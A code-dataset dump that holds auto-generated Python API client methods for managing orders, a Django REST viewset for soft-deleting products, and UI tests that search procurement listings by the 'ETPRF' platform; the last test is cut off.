:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str promo_code: Promo code of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'promo_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_promotion" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `remove_promotion`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `remove_promotion`")
# verify the required parameter 'promo_code' is set
if ('promo_code' not in params) or (params['promo_code'] is None):
raise ValueError("Missing the required parameter `promo_code` when calling `remove_promotion`")
resource_path = '/orders/{direction}/{orderID}/promotions/{promoCode}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
if 'promo_code' in params:
path_params['promoCode'] = params['promo_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def save(self, direction, order_id, order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.save(direction, order_id, order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Order order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.save_with_http_info(direction, order_id, order, **kwargs)
else:
(data) = self.save_with_http_info(direction, order_id, order, **kwargs)
return data
def save_with_http_info(self, direction, order_id, order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.save_with_http_info(direction, order_id, order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Order order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `save`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `save`")
# verify the required parameter 'order' is set
if ('order' not in params) or (params['order'] is None):
raise ValueError("Missing the required parameter `order` when calling `save`")
resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order' in params:
body_params = params['order']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def set_billing_address(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_billing_address(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.set_billing_address_with_http_info(direction, order_id, address, **kwargs)
else:
(data) = self.set_billing_address_with_http_info(direction, order_id, address, **kwargs)
return data
def set_billing_address_with_http_info(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_billing_address_with_http_info(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'address']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_billing_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `set_billing_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `set_billing_address`")
# verify the required parameter 'address' is set
if ('address' not in params) or (params['address'] is None):
raise ValueError("Missing the required parameter `address` when calling `set_billing_address`")
resource_path = '/orders/{direction}/{orderID}/billto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'address' in params:
body_params = params['address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def set_shipping_address(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_shipping_address(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.set_shipping_address_with_http_info(direction, order_id, address, **kwargs)
else:
(data) = self.set_shipping_address_with_http_info(direction, order_id, address, **kwargs)
return data
def set_shipping_address_with_http_info(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_shipping_address_with_http_info(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'address']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_shipping_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `set_shipping_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `set_shipping_address`")
# verify the required parameter 'address' is set
if ('address' not in params) or (params['address'] is None):
raise ValueError("Missing the required parameter `address` when calling `set_shipping_address`")
resource_path = '/orders/{direction}/{orderID}/shipto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'address' in params:
body_params = params['address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def ship(self, direction, order_id, shipment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.ship(direction, order_id, shipment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Shipment shipment: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.ship_with_http_info(direction, order_id, shipment, **kwargs)
else:
(data) = self.ship_with_http_info(direction, order_id, shipment, **kwargs)
return data
def ship_with_http_info(self, direction, order_id, shipment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.ship_with_http_info(direction, order_id, shipment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Shipment shipment: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'shipment']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method ship" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `ship`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `ship`")
# verify the required parameter 'shipment' is set
if ('shipment' not in params) or (params['shipment'] is None):
raise ValueError("Missing the required parameter `shipment` when calling `ship`")
resource_path = '/orders/{direction}/{orderID}/ship'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'shipment' in params:
body_params = params['shipment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def submit(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.submit(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.submit_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.submit_with_http_info(direction, order_id, **kwargs)
return data
def submit_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.submit_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method submit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `submit`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `submit`")
resource_path = '/orders/{direction}/{orderID}/submit'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 44.579091
| 195
| 0.582213
| 12,279
| 114,702
| 5.256617
| 0.023373
| 0.030908
| 0.032969
| 0.023425
| 0.972857
| 0.962554
| 0.95865
| 0.954807
| 0.951058
| 0.94686
| 0
| 0.001316
| 0.330805
| 114,702
| 2,572
| 196
| 44.596423
| 0.839587
| 0.35009
| 0
| 0.811229
| 1
| 0
| 0.204687
| 0.037315
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034988
| false
| 0
| 0.005696
| 0
| 0.092758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fce10226c020f854fc867dc34e7ec5a92e4a6f62
| 6,690
|
py
|
Python
|
marketplace_api/apps/products/api/views/product_viewsets.py
|
JOSECONDORI5/API-marketplace
|
2a1aed133c0b49e0e89f3a05cc94aa2b711d36e0
|
[
"MIT"
] | null | null | null |
marketplace_api/apps/products/api/views/product_viewsets.py
|
JOSECONDORI5/API-marketplace
|
2a1aed133c0b49e0e89f3a05cc94aa2b711d36e0
|
[
"MIT"
] | null | null | null |
marketplace_api/apps/products/api/views/product_viewsets.py
|
JOSECONDORI5/API-marketplace
|
2a1aed133c0b49e0e89f3a05cc94aa2b711d36e0
|
[
"MIT"
] | null | null | null |
from rest_framework import generics, status
from rest_framework import viewsets
from rest_framework.response import Response
from apps.base.api import GeneralListApiView
from apps.products.api.serializers.product_serializer import ProductSerializer
from apps.users.authentication_mixins import Authentication
class ProductViewSet(Authentication, viewsets.ModelViewSet):
    """CRUD endpoints for products.

    Deletion is a soft delete: ``destroy`` flags ``state = False`` and
    every query filters on ``state=True`` so inactive products are hidden.
    """
    serializer_class = ProductSerializer

    def get_queryset(self, pk=None):
        """Return the active-products queryset, or a single active
        instance (or None) when *pk* is given."""
        if pk is None:
            return self.get_serializer().Meta.model.objects.filter(state=True)
        return self.get_serializer().Meta.model.objects.filter(id=pk, state=True).first()

    def list(self, request):
        """List all active products."""
        product_serializer = self.get_serializer(self.get_queryset(), many=True)
        return Response(product_serializer.data, status=status.HTTP_200_OK)

    def create(self, request):
        """Create a product from the request payload; 400 on invalid data."""
        serializer = self.serializer_class(data=request.data)
        if serializer.is_valid():
            serializer.save()
            return Response({'message': 'Producto creado correctamente!'},
                            status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def update(self, request, pk=None):
        """Update an existing active product.

        Bug fix: the original implicitly returned ``None`` (an HTTP 500)
        when no active product matched *pk*; a 400 error response is now
        returned, mirroring ``destroy``.
        """
        instance = self.get_queryset(pk)
        if instance:
            # Bind the serializer to the existing instance so save() updates it.
            product_serializer = self.serializer_class(instance, data=request.data)
            if product_serializer.is_valid():
                product_serializer.save()
                return Response(product_serializer.data, status=status.HTTP_200_OK)
            return Response(product_serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
        return Response({'error': 'No existe un producto con estos datos!'},
                        status=status.HTTP_400_BAD_REQUEST)

    def destroy(self, request, pk=None):
        """Soft-delete a product by setting ``state = False``."""
        product = self.get_queryset().filter(id=pk).first()
        if product:
            product.state = False
            product.save()
            return Response({'message': 'Producto eliminado correctamente!'},
                            status=status.HTTP_200_OK)
        return Response({'error': 'No existe un producto con estos datos!'},
                        status=status.HTTP_400_BAD_REQUEST)
# class ProductListAPIView(GeneralListApiView):
# serializer_class = ProductSerializer
# class ProductListCreateAPIView(generics.ListCreateAPIView):
# serializer_class = ProductSerializer
# queryset = ProductSerializer.Meta.model.objects.filter(state=True)
#
# # def get_queryset(self):
# # assert
# # return self.queryset
#
# def post(self, request):
# # Send information to serializer
# serializer = self.serializer_class(data=request.data)
# if serializer.is_valid():
# serializer.save()
# return Response({'message': 'Producto creado correctamente!'}, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
# class ProductRetrieveUpdateDestroyAPIView(generics.RetrieveUpdateDestroyAPIView):
# serializer_class = ProductSerializer
#
# def get_queryset(self, pk=None):
# if pk is None:
# return self.get_serializer().Meta.model.objects.filter(state=True)
# else:
# return self.get_serializer().Meta.model.objects.filter(id=pk, state=True).first()
#
# def patch(self, request, pk=None):
# # product = self.get_queryset().filter(id=pk).first()
# # if product:
# if self.get_queryset(pk):
# # product_serializer = self.serializer_class(product)
# product_serializer = self.serializer_class(self.get_queryset(pk))
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
#
# def put(self, request, pk=None):
# if self.get_queryset(pk):
# # Send information to serializer referencing the instance
# product_serializer = self.serializer_class(self.get_queryset(pk), data=request.data)
# if product_serializer.is_valid():
# product_serializer.save()
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response(product_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
# def delete(self, request, pk=None):
# product = self.get_queryset().filter(id=pk).first()
# if product:
# product.state = False
# product.save()
# return Response({'message': 'Producto eliminado correctamente!'}, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
# def get(self, request, pk=None):
# pass
# class ProductDestroyAPIView(generics.DestroyAPIView):
# serializer_class = ProductSerializer
#
# def get_queryset(self):
# return self.get_serializer().Meta.model.objects.filter(state=True)
#
# def delete(self, request, pk=None):
# product = self.get_queryset().filter(id=pk).first()
# if product:
# product.state = False
# product.save()
# return Response({'message': 'Producto eliminado correctamente!'}, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
# class ProductUpdateAPIView(generics.UpdateAPIView):
# serializer_class = ProductSerializer
#
# def get_queryset(self, pk):
# # return self.get_serializer().Meta.model.objects.filter(state=True)
# return self.get_serializer().Meta.model.objects.filter(state=True).filter(id=pk).first()
#
# def patch(self, request, pk=None):
# # product = self.get_queryset().filter(id=pk).first()
# # if product:
# if self.get_queryset(pk):
# # product_serializer = self.serializer_class(product)
# product_serializer = self.serializer_class(self.get_queryset(pk))
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
#
# def put(self, request, pk=None):
# if self.get_queryset(pk):
# product_serializer = self.serializer_class(self.get_queryset(pk), data=request.data)
# if product_serializer.is_valid():
# product_serializer.save()
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response(product_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| 46.458333
| 114
| 0.679223
| 763
| 6,690
| 5.78637
| 0.123198
| 0.092412
| 0.076104
| 0.043035
| 0.807022
| 0.807022
| 0.807022
| 0.786863
| 0.775085
| 0.774405
| 0
| 0.011941
| 0.21136
| 6,690
| 143
| 115
| 46.783217
| 0.824867
| 0.663229
| 0
| 0.057143
| 0
| 0
| 0.055892
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.171429
| 0
| 0.628571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
1e24003b925d542d0967fb8b130c585bd9cf072e
| 9,028
|
py
|
Python
|
test/test_SM/test_ploshadki/test_ploshadka_ETPRF.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_SM/test_ploshadki/test_ploshadka_ETPRF.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_SM/test_ploshadki/test_ploshadka_ETPRF.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
def test_sm_etprf_include_eic_yestoday(app):
    """Search ETPRF purchases with publish-date option (3, 0) — per the
    test name, "yesterday" — and expect more than 100 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): ensure_login_sm is called twice back-to-back —
    # presumably a workaround for a flaky login; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(3, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 100
def test_sm_etprf_without_eic_yestoday(app):
    """Same "yesterday" ETPRF search but with three extra container
    filters applied (the "without EIC" variant); expect > 30 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(3, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.find_in_container_number(11, 2, 1)
    app.testHelperSMSearch.find_in_container_number(11, 6, 3)
    app.testHelperSMSearch.find_in_container_number(11, 6, 4)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 30
def test_sm_etprf_include_eic_yestoday_today(app):
    """Search ETPRF purchases with publish-date option (11, 0) — per the
    test name, "yesterday + today" — and expect more than 100 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(11, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 100
def test_sm_etprf_without_eic_yestoday_today(app):
    """Same "yesterday + today" ETPRF search with three extra container
    filters (the "without EIC" variant); expect > 30 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(11, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.find_in_container_number(11, 2, 1)
    app.testHelperSMSearch.find_in_container_number(11, 6, 3)
    app.testHelperSMSearch.find_in_container_number(11, 6, 4)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 30
def test_sm_etprf_include_eic_7_days(app):
    """Search ETPRF purchases with publish-date option (4, 0) — per the
    test name, "last 7 days" — and expect more than 600 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(4, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 600
def test_sm_etprf_without_eic_7_days(app):
    """Same "last 7 days" ETPRF search with three extra container
    filters (the "without EIC" variant); expect > 120 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(4, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.find_in_container_number(11, 2, 1)
    app.testHelperSMSearch.find_in_container_number(11, 6, 3)
    app.testHelperSMSearch.find_in_container_number(11, 6, 4)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 120
def test_sm_etprf_include_eic_current_month(app):
    """Search ETPRF purchases with publish-date option (5, 0) — per the
    test name, "current month" — expecting at least ~100 per elapsed day."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
